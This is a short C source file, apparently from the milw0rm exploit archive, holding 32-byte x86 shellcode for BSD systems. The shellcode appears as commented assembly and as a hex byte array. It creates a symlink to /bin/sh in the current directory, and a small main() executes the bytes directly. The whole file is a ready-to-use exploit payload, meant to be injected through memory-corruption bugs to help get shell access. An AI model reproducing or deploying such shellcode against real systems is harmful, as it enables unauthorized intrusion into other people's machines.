/*The shellcode calls the symlink() and makes the 
 link to the /bin/sh in the current dir.
	short version
 size = 32 bytes
 OS   = *BSD
 	written by /rootteam/dev0id (www.sysworld.net)
				dev0id@uncompiled.com	
	
BITS 32
jmp short	callme
main:
	pop	esi
	xor	eax,eax
	mov byte [esi+7],al
	lea	ebx,[esi+5]
	push	ebx
	lea	ebx,[esi]
	push	ebx
	mov	al,57
	push	eax
	int	0x80
	
callme:
	call	main
	db	'/bin/sh'
*/

char shellcode[] =
	"\xeb\x12\x5e\x31\xc0\x88\x46\x07\x8d\x5e\x05\x53\x8d\x1e\x53"
	"\xb0\x39\x50\xcd\x80\xe8\xe9\xff\xff\xff\x2f\x62\x69\x6e\x2f"
	"\x73\x68";

int
main (void)
{
	void (*code)(void);
	code=(void(*)())shellcode;
	(void)code();
	return 0;
}

// milw0rm.com [2004-09-26]